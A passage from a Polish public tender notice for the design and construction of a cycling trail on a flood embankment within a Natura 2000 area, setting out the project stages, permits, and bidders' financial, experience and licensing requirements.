	Rozporządzenie Ministrów Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipca 2002 roku w sprawie znaków i sygnałów drogowych (D.U.2002.170.1393 z póź.zm.)
	Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003 roku w sprawie szczegółowych  warunków technicznych  dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (D.U.2003.220.2181 z póź.zm.)
	Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003r w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzeniem (D.U.2003.177.1729)
	Rozporządzenie Ministrów Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipca 2002 r. w sprawie znaków i sygnałów drogowych (Dz. U. Nr 170, poz. 1393, z późn. zm)
	Obowiązujące normy i przepisy branżowe

Szczegółowy wykaz czynności i obowiązków wykonawcy w ramach prac projektowych do wykonania zawiera PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.

Do podstawowych obowiązków Wykonawcy w ramach prac projektowych należą:
1) Wykonanie koncepcji przedmiotu umowy z uwzględnieniem opisów i kierunku obranego przez Wykonawcę oraz Przedstawienie jej Zamawiającemu do akceptacji w celu realizacji przedmiotu umowy.

Wykonawca usług projektowych powinien przedstawić rozwiązania projektowe, które zamierza zastosować w opracowaniu dokumentacji technicznej, (wersję roboczą, w formie pisemnej), do akceptacji przez Zamawiającego, w jego siedzibie przed przystąpieniem do stosowania ich w pracach projektowych, w ciągu 30 dni od dnia podpisania umowy.
2) Wykonanie Projektu budowlanego obejmującego:
a) projekt architektoniczno-budowlany  6 egz.,
b) projekt zagospodarowania terenu  6 egz.
Wykonawca przedstawi Projekt Budowlany do akceptacji Zamawiającemu w celu realizacji przedmiotu umowy.   

3) Wykonanie Projektu wykonawczego  4 egz.,
Wykonawca przedstawi Projekt Wykonawczy do akceptacji Zamawiającemu w celu realizacji przedmiotu umowy.
Projekt Wykonawczy  Szczegółową definicję projektu wykonawczego oraz skład i zakres dokumentacji wchodzącej w projekt wykonawczy zawiera PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.
4) Wykonanie STWiORB  4 egz.
5) Wykonanie przedmiaru robót 4 egz.
UWAGA!
Wykonawca zamówienia oprócz wersji papierowej ww. składników dokumentacji projektowej zobowiązany jest przedłożyć Zamawiającemu wersję elektroniczną w formatach  odpowiednio dla plików graficznych w formacie AutoCad (*dwg) lub równoważnie, dla plików tekstowych DOC oraz dodatkowo dla wszystkich powyższych również w formie plików nieedytowanych (*pdf ).

Etap II
Uzyskanie wszystkich wymaganych przepisami decyzji i uzgodnień [DŚ, PWP, DL, Pnb]

1.	Wnioski administracyjne (wnioski o wydanie pozwolenia wodnoprawnego, pozwolenia na Budowę, zgłoszenia robót) składa Zamawiający, po otrzymaniu od Wykonawcy kompletnego wniosku wraz ze wszystkimi niezbędnymi załącznikami. Zamawiający złoży do właściwego urzędu wniosek w ciągu 5 dni od dnia otrzymania kompletnego wniosku wraz z załącznikami od Wykonawcy. Uwagi do złożonych załączników (dokumentacji projektowej) i wniosków Zamawiający przekazuje Wykonawcy, który po ich wyjaśnieniu i poprawieniu oddaje Zamawiającemu w celu ich ponownego złożenia do organów. 

2.	Wykonawca jest zobowiązany do protokolarnego przekazywania dokumentacji niezbędnej do wykonania przedmiotu umowy niezwłocznie po jej wykonaniu przed złożeniem dokumentacji zgodnie z obowiązująca procedurą administracyjną dotyczącą wykonywanego projektu (w formie papierowej i elektronicznej).

3.	W toku prac projektowych, a przed uzyskaniem pozwolenia na budowę, strony dopuszczają możliwość wprowadzania niewielkich zmian i korekt dotyczących przebiegu i lokalizacji szlaku rowerowego lub lokalizacji zjazdów ze szlaku rowerowego obejmujących również zmianę działek, na których projektowany jest szlak rowerowy. 

UWAGA!
1.	Dla terenu nie uchwalono Miejscowego Planu Zagospodarowania Przestrzennego, ani nie pozyskano Decyzji o Lokalizacji Inwestycji Celu Publicznego, obszar inwestycji znajduje się w obszarze Natura 2000 oraz nad wodami płynącymi. Wykonawca zobowiązany jest do uzyskania wszelkich niezbędnych opinii, uzgodnień i weryfikacji w zakresie wynikającym z obowiązujących przepisów prawa.
2.	Do projektu budowlanego należy ponadto dołączyć:
	wykaz wykonanych opracowań,
	 oświadczenie projektanta i osoby sprawdzającej o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami, zasadami wiedzy technicznej,
	oświadczenie projektanta, że dokumentacja projektowa którą sporządził jest wykonana zgodnie z umową i jest kompletna z punktu widzenia celu któremu ma służyć,
	oświadczenie projektanta o przeniesieniu na Zamawiającego autorskich praw majątkowych na wszelkich polach eksploatacji sporządzonej dokumentacji projektowej.

Kserokopie wszelkich decyzji, opinii i uzgodnień Wykonawca na bieżąco będzie przekazywał Zamawiającemu w terminach umożliwiających ew. skorzystanie z trybu odwoławczego.

UWAGA!
Wykonawca jest zobowiązany uzyskać stosowne uzgodnienia, decyzje i umowy lub zezwolenia na prowadzenia prac z właścicielami i zarządcami terenów, na których prowadzone będą prace i terenów wykorzystywanych przez Wykonawcę w trakcie budowy. Wykonawca poniesie koszty z tym związane.

Etap III
Roboty budowlano  montażowe (RBM)
Szczegółowe dane w zakresie RBM dotyczące:
	zakresu prac budowlano  montażowych do wykonania,
	wykazu dokumentacji powykonawczej dostarczanej Zamawiającemu,
	rodzaju czynności, które wykona Wykonawca podczas prowadzonych robót
 zawiera PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.
Wymagania dla nadzoru autorskiego zawarto w PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.
Sposób ustalenia Ceny  zawarto w PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.
UWAGA!
Wykonawca jest zobowiązany do wykonania dokumentacji fotograficznej przed przystąpieniem do wykonywania robot, dokumentowania prac ulegających zakryciu oraz prac zakończonych. Dokumentację fotograficzną załączy do dokumentacji powykonawczej.

Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr 5 do niniejszego SIWZ.
Pozostałe szczegółowe warunki wykonania zamówienia opisane są w Programie Funkcjonalno Użytkowym (PFU) który stanowi  załącznik nr 4 do niniejszej SIWZ.

Deklaracja NATURA 2000 - wskazany dokument udostępniony będzie Wykonawcy
 w momencie podpisania umowy. 
Zamawiający oczekuje, od Wykonawcy w ramach powyższego zamówienia, dokładnego określenia parametrów ścieżek w taki sposób, aby przy realizacji i spełnieniu głównego celu przedmiotu umowy jakim jest zaprojektowanie i wykonanie  szlaku rowerowego na wale przeciwpowodziowym, zapewnić jednocześnie warunki wynikające z deklaracji Natura 2000 oraz innych postanowień i decyzji, wynikających z zakończonego postępowania oceny oddziaływania na środowisko obejmujących obszar oddziaływania projektu (OOŚ) .

<br /><br /><b>II.5) Główny kod CPV: </b>45200000-9<br /><b> Dodatkowe kody CPV:</b>71322000-1,
                71240000-2,
                71248000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                sytuacji finansowej lub ekonomicznej:  posiadanie zdolności kredytowej na kwotę nie mniejszą niż: 
5.000.000,00 zł brutto (słownie: pięć milionów złotych brutto) lub środki finansowania zgromadzone na rachunku bankowym lub w spółdzielczej kasie oszczędnościowo kredytowej na kwotę nie mniejszą niż: 5.000.000,00 zł brutto (słownie: pięć milionów złotych brutto).

Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.   

UWAGA!
1. W sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji innego podmiotu zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów niezbędnymi w trakcie realizacji zamówienia. 
2. W tym celu Wykonawca musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia  zgodnie z załącznikiem nr 2c do SIWZ.
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się powołuje Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postępowaniu. 
4.Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1323 i ust. 5. 
5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
6. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 1 nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda aby wykonawca w terminie określonym przez zamawiającego:
1) zastąpił ten podmiot innym podmiotem lub podmiotami lub
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne luz zawodowe, o których mowa w ust. 1.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
8.Wykonawca który polega na sytuacji finansowej lub ekonomicznej innych podmiotów odpowiada solidarnie z  podmiotem który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów ,chyba że za nieudostępnienie zasobów nie ponosi winy.
9.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby przynajmniej jeden z Wykonawców spełniał lub wspólnie spełniali warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. W przypadku warunku dotyczącego sytuacji ekonomicznej lub finansowej, oceniana będzie ich łączna sytuacja ekonomiczna.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) należytym wykonaniem nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej dwóch robót budowlanych z zakresu wykonania szlaku rowerowego o łącznej wartości nie mniejszej niż 3.000.000,00 zł brutto (słownie: trzy miliony złotych); 
b) należytym wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej dwóch pracy projektowych w zakresie wykonania szlaku rowerowego o wartości łącznej nie mniejszej niż 100.000,00 zł brutto (słownie: sto tysięcy złotych),  
c) dysponowaniem przynajmniej jedną osobą odpowiedzialną za kierowanie  robotami budowlanymi, posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2016r., poz. 290 z późn. zm.) i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 ze zm.) w specjalności inżynierii hydrotechnicznej zgodnie z § 13 ust. 10 lub 11 ww. rozporządzenia lub inne uprawnienia odpowiadającymi powyższym, wydane na podstawie wcześniej obowiązujących przepisów lub posiadającymi zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. 2016r.,  poz. 65 z poźn.zm.). 
d) dysponowaniem przynajmniej jedną osobą posiadającą kwalifikacje niezbędne do realizacji zamówienia, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2016r., poz. 290 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 ze zm.) tj. uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej do projektowania bez ograniczeń lub inne uprawnienia odpowiadającymi powyższym, wydane na podstawie wcześniej obowiązujących przepisów lub posiadającymi zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. 2016r.,  poz. 65 z poźn.zm.). 
Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.   

UWAGA!
1. W sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji innego podmiotu zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów niezbędnymi w trakcie realizacji zamówienia. 
2. W tym celu Wykonawca musi przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia  zgodnie z załącznikiem nr 2c do SIWZ.
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się powołuje Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postępowaniu. 
4.Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1323 i ust. 5. 
5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 
6. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 1 nie potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda aby wykonawca w terminie określonym przez zamawiającego:
1) zastąpił ten podmiot innym podmiotem lub podmiotami lub
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne luz zawodowe, o których mowa w ust. 1.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.
8.Wykonawca który polega na sytuacji finansowej lub ekonomicznej innych podmiotów odpowiada solidarnie z  podmiotem który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów ,chyba że za nieudostępnienie zasobów nie ponosi winy.
9.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby przynajmniej jeden z Wykonawców spełniał lub wspólnie spełniali warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. W przypadku warunku dotyczącego sytuacji ekonomicznej lub finansowej, oceniana będzie ich łączna sytuacja ekonomiczna.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy,
2)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub innego dokumentu potwierdzającego że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami w szczególności, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3)	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub innego dokumentu  potwierdzającego  że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami w szczególności  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Aktualnej informacji z Krajowego Rejestru Karnego  w zakresie określonym w art 24 ust 1 pkt 21 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty przez wspólników spółki cywilnej dokumenty wymienione w pkt od 1  4  muszą być złożone oddzielnie dla każdego ze wspólników oraz dla spółki cywilnej.

Uwaga!
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zasoby innych podmiotów (podwykonawców), które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu (podwykonawcy) w zakresie wymaganym dla wykonawcy w Rozdziale III, B pkt 1-4.

1. W celu wstępnego potwierdzenia spełnienia warunków, o których mowa w rozdziale III część I i II SIWZ wraz z ofertą należy złożyć następujące dokumenty: 
1.1. aktualne na dzień składania ofert oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu zgodnie z załącznikiem nr 2a do SIWZ.
1.2 aktualne na dzień składania ofert oświadczenie, że nie podlega wykluczeniu zgodnie załącznikiem nr 2b do SIWZ.
2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnienie warunków w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw do wykluczenia.
3.Wykonawca, który powołuje się na zasoby innych podmiotów w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia w zakresie w jakim powołuje się na ich zasoby  warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 1.1 i 1.2 tj. załączniki 2a i 2b do SIWZ.

4. Wykonawca który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu o którym mowa w pkt.1.2 - zgodnie z załącznikiem nr 2b do SIWZ. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie zawierający co najmniej dwie roboty budowlane z zakresu wykonania szlaku rowerowego o łącznej wartości nie mniejszej niż 3.000.000,00 zł brutto (słownie: trzy miliony złotych); wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowalne były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty sporządzony według załącznika nr 7 do SIWZ. 
 
b)	wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie zawierający co najmniej dwóch prac projektowych w zakresie wykonania szlaku rowerowego o wartości łącznej nie mniejszej niż 100.000,00 zł brutto (słownie: sto tysięcy złotych) z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz,  których usługi  zostały wykonane wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie  sporządzony według załącznika nr 6 do SIWZ. 
 
Do wykazów w zakresie zdolności technicznej lub zawodowej  (załącznik nr 6 i 7 do SIWZ) należy dołączyć dowody, że roboty i usługi zostały wykonane należycie.  Dowodami, o których mowa w pkt 2 są: 
- referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego roboty i  usługi zostały wykonywane, 
- inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w wymienionych dokumentów. 
 
Jeżeli wykaz,  oświadczenia  lub inne złożone przez Wykonawcę dokumenty  budzą  wątpliwości Zamawiającego   może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były wykonane, o  dodatkowe  informacje  lub dokumenty w tym zakresie. 
 
c) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy, które zawiera wskazanie przynajmniej jednej osoby odpowiedzialnej za kierowanie robotami budowlanymi, posiadającej uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2016r., poz. 290 z późn. zm.) i Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 ze zm.) w specjalności inżynierii hydrotechnicznej zgodnie z § 13 ust. 10 lub 11 ww. rozporządzenia lub inne uprawnienia odpowiadającymi powyższym, wydane na podstawie wcześniej obowiązujących przepisów lub posiadającymi zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016r.,  poz. 65 z poźn.zm.)  sporządzony według załącznika nr 9 do SIWZ. 

d)	oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy, które zawiera wskazanie przynajmniej jednej osoby posiadającej kwalifikacje niezbędne do realizacji zamówienia, zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2016r., poz. 290 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 ze zm.) tj. uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej do projektowania bez ograniczeń lub inne uprawnienia odpowiadającymi powyższym, wydane na podstawie wcześniej obowiązujących przepisów lub posiadającymi zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016r.,  poz. 65 z poźn.zm.)  sporządzony według załącznika nr 10 do SIWZ. 

e)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert na kwotę nie mniejszą niż 5.000.000,00 zł brutto (słownie: pięć milionów złotych). 
Jeżeli z uzasadnionej przyczyny, Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub  ekonomicznej wymaganych przez Zamawiającego, może on złożyć inny dokument który w wystarczający sposób potwierdza spełnienie opisanego przez  Zamawiającego warunku udziału w postępowaniu. 


Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.  
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
